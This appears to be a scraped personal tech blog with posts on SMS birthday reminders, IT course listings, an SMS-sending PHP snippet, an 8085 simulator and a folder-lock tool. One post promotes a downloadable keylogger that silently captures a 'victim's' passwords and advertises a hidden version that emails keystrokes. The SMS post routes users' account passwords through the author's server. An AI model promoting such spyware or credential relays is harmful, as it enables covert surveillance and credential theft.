Translate

Saturday, May 11, 2013

How to get Friend's birthday reminder SMS..!!!!


Friend's Birthday reminder SMS for FREE...!

With the help of this simple tutorial you will get free SMS as your friend's Birthday reminder without any charges. You can set the time of the reminder SMS (one day before or two day before your friend’s Birthday).  For this you need  a Google account and Facebook account. Here we are using Facebook birthday database and Google messaging service. Please go through the following steps, If you have any doubt please ask to me
Email:  info.pravysoft@gmail.com


  1. Go to Google calender 
  2. Login with your google (gmail) username and password..
  3. After login you can see My calender at left hand side(Fig 1)


  4. Fig 1 :Google calendar  MENU
  5. Click on the down arrow button near My calendars
  6. Click on create new calendar button
  7. Give a suitable name for your calendar (say PravySoft_SMS) and description




  8. Don't check the box Make this calendar public
  9. Finally click Create calendar button
  10. Now you can see the newly created Calender under My calendars (Here PravySoft_SMS)
  11. Goto upper right corner of the browser click on the small wrench icon  button and select settings
  12. goto Mobile settings and give your mobile number there and click verification code button. You need to enter your verification code (Google will sent an sms to you which will contain the verification code) on the text box. And finally click on the Finish setup button
  13. Now goto your Facebook page 
  14. Click on EVENTS link below your profile photo
  15. Click the small wretch icon near Today button and select Export
  16. Dont click Close Button Now
  17. On the popup window, Right click above export your friend's birthdays link and click on Copy Link Location.( Copy link address)
  18. Open a webbrowser (firefox ,chrome etc), Paste the content address URL (Just click paste)
  19. the address should be like this 
  20. Webcal://www.facebook.com/ical/b.php?uid=1846667233&key=AQAz_SefXt22euxS
  21. Remove Webcal://  text at the beginning of the address Then click go (Enter)
  22. You can see a file like the name uxxx.ics is downloading (Give permission if needed, save the file)
  23. Now again goto Google calendars go to settings and select calendars
  24. click import calendar and Browse the file you have downloaded from Facebook earlier (Uxxx.icl) select the calendar name also (for me PravySoft_SMS) Then click Import
  25. Select the  Reminders and notifications tab.
  26. Click on Add a reminder.
  27. Select SMS and how early you want yourself to be notified about the upcoming birthday.
  28. Click on Save button.
  29. That all You will get your friends Birthday reminders for FREE!!!!!!!!!!!!



Tuesday, January 29, 2013

Courses offered in PravySoft Kerala

Andriod
Andriod Application Development
 

Basic Computer training
Computer Basics
Software Installation
Internet & Email
Social Networking
Computer Maintenance
MS Excel
MS Office
MS Outlook
MS Word
computer course
Desktop Publishing (DTP)
 

C C++
Advanced C C++
C Programming
C C++ Projects
C | C++
C Sharp
 

Final Year Projects
Acadamic Projects
ASP final year Projects
Electronics Projects
Embedded Final Year Projects
IEEE final year Projects
IT Projects
J2ME Final Year Projects
Java Final Year Projects
MCA Projects
Mech Projects
Mini Projects
Msc Projects
Networking Projects
Academic Projects
PHP final Year Projects
 

GATE Exam
GATE exam Preperation
CSIR NET
 

IT Security & Ethical Hacking
Desktop & Server Security
Malware Analysis
Network Security
Firewall Security
Internet Security
Scanning Fingerprinting
Computer Forensics
ISO27001 & ISO27002 Lead Auditor
Cloud Security
Penetration Testing
Application Security
Cryptography Stagnography
Cyber Forensics
Security Auditing
CISM Certification
 

JAVA J2EE
Advanced JAVA
Core JAVA
DAO
Hibernate
J2EE
J2EE Projects
J2ME
J2ME Projects
Java Certification
Java projects
Java Script
JSP
RMI
Servlet
Spring
Struts
Web Services
Weblogic
Websphere
XML Webservices
liferay
Eclipse
 

Linux
Linux Administration
Linux Basics
RedHat linux
Unix
 

MCSE
MCSE Win 2000
Micorsoft MCSE
 

MS SQL
Crystal Reports
MS SQL Administration
MS SQL Certification
MS SQL Development
MS SQL General
MS SQL Integration
MS SQL Reporting
Performance tuning Projects
SQL Programming
 

MySQL
MySQL Certification
MySQL Cluster
MySQL Consultant
MySQL DBA
MySQL Development
 

Networking
CCNA Certification
CCNP Certification
CCSA Certificaiton
CCSE Certification
MCSE Certification
Networking General
Novell CNA
RHCE Certification
 

Oracle BPM 10G
BPM 10G
 

PHP
Advanced PHP
Php AJAX
Joomla
JQuery
MySQL
OsCommerce
PHP
PHP Realtime Projects
PHP Web 2.0
Smarty
WordPress
Moodle
Drupal CMS
CodeIgniter Framework
Zend Framework
CakePHP
Magento eCommerce
PHP CMS
Tquery
jQuery
 

Project Management
Project Mangement Institute
PRINCE2
Microsoft Project
Primavera
PMI-Agile ACP
Agile
Scrum master certification
Kanban
Lean Manufacturing
Balanced Scorecard
CCPM
CompTIA Project+
 

Real time Projects
ASP .Net Live Projects
Embedded Projects
IEEE Live Projects
Informatica Live Projects
J2ME Realtime Projects
Java Live Projects
Networking Certification
Oracle Projects
Other Projects
Peoplesoft Projects
PHP Live Projects
SAP Projects
Siebel Projects
 

Software Testing
Software Testing Certification
ISTQB
Load Runner
Manual Testing
Mercury
Automation Testing
QTP
Rational Rose
Win Runner
Telecom Testing
 

Web Designing
Advanced Web Designing
CSS
Dreamweaver
Dynamic Websites
Flash
HTML
Website Scripting
Logo Design
PhotoShop
Static Websites
Template Desging
Web 2.0
Web Designing
XHTML
HTML5
ColdFusion
Perl CGI
 

WebLogic
Weblogic Developer
WebLogic Administrator
 

XML
XML

Wednesday, January 23, 2013

Send SMS from JSP ASP and PHP projects

EASY Way to sens message (SMS) from your project

In this post I would like to explain how you can send sms from your web project. You can use any programming language. The method successfully worked out using PHP, JSP and ASP Platforms.






PravySoft SMS senter

Please do following steps

1)First you need an 160by2.com account. 
You will get free 160by2 account from this website
 http://160by2.com

2) Writedown your  username and password
 Normally username would be your Mobile Phone number

3)From your project call this web link with your username password and message as shown below

http://pravysoft.eu5.org/sms.php?username=xxx&password=yyy&button=1&to=zzz&msg=abcd


Please replace
XXX with your username
YYY with password
ZZZ with Mobile number of the recipient
ABCD with your msg.


Example PHP script

This is a simple code for demonstration of the method. Please use url encode function and POST method (to hide username password from url) for implementation.

<?php
$username="your username";              // username you got from 160by2.com website
$password="your password";             //your password
$to="99956xxxxx";                           //Phone number to send msg
$msg="TEST";                //Message to  send you can use url encode function if space exist in your message
echo('<a href="http://pravysoft.eu5org/sms.php?username='.$username.'&password='.$password.'&button=1&to='.$to.'&msg='.$msg.'">SEND SMS</a>');
?>


You can send sms (Text messgaes) using JSP and ASP using similar way.

If you want to know more or need codes please ask to me

info.pravysoft@gmail.com

or visit



Thursday, August 2, 2012

PravySoft Portable Keylogger



Note: Hacking is a crime. Don't use this tutorial to hack innocent people. I am sharing it for educational purpose only and to show internet banking is not safe and our personal computer is a loop hole . I (Praveen Thappily)will not be responsible for any damage done by you. This software is capable to store username and password of users.Firefox,opera,Google chrome, internet explorer etc are supported.

 PravySoft Portable Keylogger



Dear friends

Here I am introducing a tool which is used for storing all keystrokes  typed by you silently. You can store all information including usernames and passwords which is typed by our victim during the execution of the software! . You don’t want to install this software, ie this is a portable one, just copy and paste this software . You can use it from pendrive also. File size < 1 MB.





Where is the stored information?
  • Stored information is saved at notepad named “pravysoft.txt” which will automatically develop during the execution time.


Where is PravySoft.txt situated?
  • At the same directory where your  file is stored.


How to protect innocent people?
  • This tool shows a warning for every 100 keystrokes.
  • User can see that message .
  • Some letters are not stored (Software filtering used)


Full version features?
  • No user warning
  • No Tray icon
  • Completely hidden
  • Key strock emailing facility
What should you do while online transactions?
  • Please don't use public network.(Net cafe,College networks)
  • Please remove all external media such as Pen drives, External Hard disks etc
  • Use virtual keyboard (available in some websites, Still not secure)
  • Check your website address the prefix should be "https" instead of "http" 

How to get full version and source code?
  • You can email me about your purpose with this tool.

          info.pravysoft@gmail.com
This is a hidden tool , How to stop it?
  • Just use Task manager and Click on End task to stop this tool

Please don't use this tool or similar tool for hacking sites like SBI, PNB, ICICI, FACEBOOK, GMAIL etc. Its a crime for getting imprisonment.


Want to know more about this tool contact me



Download copy of silent keystroke saver for free







News of this software was published on Famous newspaper MALAYALA MANORAMA
Please read the news
Malayala Manorama News Calicut electronics and software project center
Add caption

Tuesday, May 29, 2012

8085 simulator for microprocessor labs


           This is a new tool to simulate your 8085 programs without using your labkit (Hardware kit used for doing your ab experiment). The Hardware kit in your lab contains 8085 ,8255, LCD, Keyboard etc.The cost of that hardware is typically 17,000-50,000 rupees. Even Windows releases its 7-th version people are using windows XP wildely. Thus this software developed in windows xp platform.So i am introducing this software. This is a free software with the help of this software you can type your program in virtual keyboard.view output in LCD. Thus you don't want to go in your lab to do 8085 experiments. And this tool is now using in at different colleges and research centers. Main features of this software are

  • Opensource
  • Built in assembler
  • Built in dissembler
  • Sample codes
  • Simulation step by step
  • Can load programs written in any other 8085 assembler
  • Powerful memory editor
  • No need Dotnet or java framework
  • Small size
  • Low RAM usage
  • Support all functions of the hardware kit
  • High speed operation
  • Online support available  

  •  




    Download issues of this software is now solved.




     

Thursday, March 8, 2012

Mozilla firefox latest version module:Do not track


Mozilla Delivers New Version of Firefox – First Web Browser in the world to Support Do Not Track on Multiple Platforms

Mozilla, a global, nonprofit organization dedicated to making the Web better,On december 2011 released a new version of Mozilla Firefox for Windows, Mac, Linux and Android. The new version of Firefox comes on the heels of the wildly successful release of Firefox 4, which had more than 200 million downloads on Windows, Mac and Linux and millions of downloads in the Android Market.
Mozilla’s shift to a rapid release development cycle delivers cutting edge Firefox features, performance enhancements, security updates and stability improvements to users faster.
The latest version of Firefox includes more than 1,000 improvements and performance enhancements that make it easier to discover and use all of the innovative features in Firefox. This release adds support for more modern Web technologies that make it easier for developers to build amazing Firefox Add-ons, Web applications and websites.
Firefox for Android includes the Do Not Track privacy feature in this release, making Firefox the first browser to support Do Not Track on multiple platforms. Mozilla created Do Not Track to give users more control over the way their browsing behavior is tracked and used on the Web. The feature, which lets users tell websites that they wish to opt-out of online behavioral tracking, is now easier to find in Firefox Preferences.


Firefox offers users complete control over the look and functionality of their Web browser with a gallery of hundreds of thousands of add-ons. About 85% of Firefox 4 users have an add-on installed to customize the look, features and functionality of their Firefox.
Mozilla has a rich set of resources that make it easier for Web developers to build compelling Firefox Add-ons using HTML, JavaScript and CSS. The new Firefox Add-on SDK for Windows, Mac and Linux enables local development of add-ons, while the Firefox Add-on Builder Beta provides a hosted Web-based build environment. Developers can build Firefox Add-ons for all platforms that install and update without requiring a browser restart or interrupting the Web browsing experience.
Firefox for Windows, Mac and Linux now supports the CSS Animations standard to enable developers to build more amazing Web applications and websites. Mozilla Hacks has a tutorial on CSS Animations and a comprehensive blog post explaining what developers can create with Firefox.
To get the latest version of Firefox for Windows, Mac or Linux click on “check for update” under the “About Firefox” menu or download the Firefox Aurora and Beta channels here. Visit this page to get the latest version of Firefox on your Android device or to join the beta. Users with Firefox for Android installed will receive a notification to update to the latest version.
For more information:
FAQ: Firefox for Windows, Mac and Linux / Firefox for Android
Long, technical release notes: Firefox for Windows, Mac and Linux / Firefox for Android

Sunday, October 16, 2011

PravySoft Portable Folder lock free download


PravySoft proudly presents Folder lock with active shield.You can save your valuable documents with the help of this tool.






Main features of this software are

1.The data will be password protected.
2.Un deletable data protection (With the help active shield,prevents unauthorized deletion )
3.Portable tool so you don't have to install this software
4.Open source,If you need source code please contact me
5.Small size <1 MB
6.Free of cost. No evaluation problem
7.You can freely distribute this software

At first you need to set a password for your shield

After that you can see a folder ' My secure folder' in My documents folder as shown the figure below

You can change your password any time.If you Locked the folder,The folder become invisible and you can delete the folder with this software. simple deletion not works in this folder.


If you find any bug or if you need source code please contact me
google@pravysoft.co.cc

or visit
http://pravysoft.eu5.org

http://pravysoft.blogspot.com